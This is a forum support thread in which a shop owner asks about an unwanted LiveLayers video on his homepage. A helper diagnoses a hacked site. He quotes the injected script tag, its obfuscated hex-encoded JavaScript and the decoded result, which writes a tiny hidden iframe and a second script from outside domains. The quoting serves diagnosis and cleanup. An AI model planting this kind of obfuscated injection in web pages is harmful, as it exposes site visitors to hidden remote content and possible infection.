Announcement

Collapse
No announcement yet.

LiveLayers

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
    #1

    LiveLayers

    HI,

    Someone has added a LiveLayers video to our homepage and ever since i cannot upload.

    It teels me i no longer have permissions?

    How can i get rid of as i cannot find it within actinic? Also have i been hacked?

    Thanks

    Bob

    www.plumbingsupplyservices.co.uk
    Tags: None
    #2
    Looks like either your PC or server are hacked. Your home page contains suspect code:
    Code:
    <body onLoad="viz();">
<script type="text/javascript" src="http://relatedtothestars.com/process.js"></script>
    And that JavaScript file contains some obfuscated code:
    Code:
    var _0x516f=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x6C\x61\x74\x65\x64\x74\x6F\x74\x68\x65\x73\x74\x61\x72\x73\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x63\x65\x73\x73\x2E\x68\x74\x6D\x6C\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x33\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x65\x77\x65\x6C\x73\x62\x79\x74\x68\x65\x6E\x69\x6C\x65\x2E\x63\x6F\x6D\x2F\x73\x74\x6F\x72\x65\x2F\x74\x68\x65\x61\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x20"]
document[_0x516f[1]](_0x516f[0]);
document[_0x516f[1]](_0x516f[2]);
    Which when decoded turn into:
    Code:
    <iframe src="http://relatedtothestars.com/process.html" width="2" height="3" frameborder="0"></iframe> ","write","<script type="text/javascript" src="http://www.jewelsbythenile.com/store/thea.js"></script>
    And some code to load the 2 URLs above.

    So an Iframe is being loaded containing content from relatedtothestars.com/process.html and also several more lines of obfuscated JavaScript from www.jewelsbythenile.com/store/thea.js. This JavaScript loads Flash code from www.livelayers.com and that's the unwanted movie.

    All dodgy stuff methinks.

    Check your Overall Layouts and see if there's anything suspicious after the <body ...> tag.

    If not it's more likely that your server is hacked and you'll have to look to your server admin people for help.
    Norman - www.drillpine.biz
    Edinburgh, U K / Bitez, Turkey

    Comment

      #3
      Could i just delete these lines out? -

      Comment

        #4
        If you find them on your PC, yes. However you'll also have to find the stuff that put them there as they will probably get re-created otherwise.

        If they're not on your PC, then it's the server that's hacked and you'll need expert help to fix that.

        You could always do a Refresh once you know the code's not in your Templates and that may knock them out on the server. Again, there's still the risk that you'll be re-infected unless the server is cleaned as whatever route they got there by won't be fixed by a Refresh.
        Norman - www.drillpine.biz
        Edinburgh, U K / Bitez, Turkey

        Comment

        Previous template Next
        Working...
        X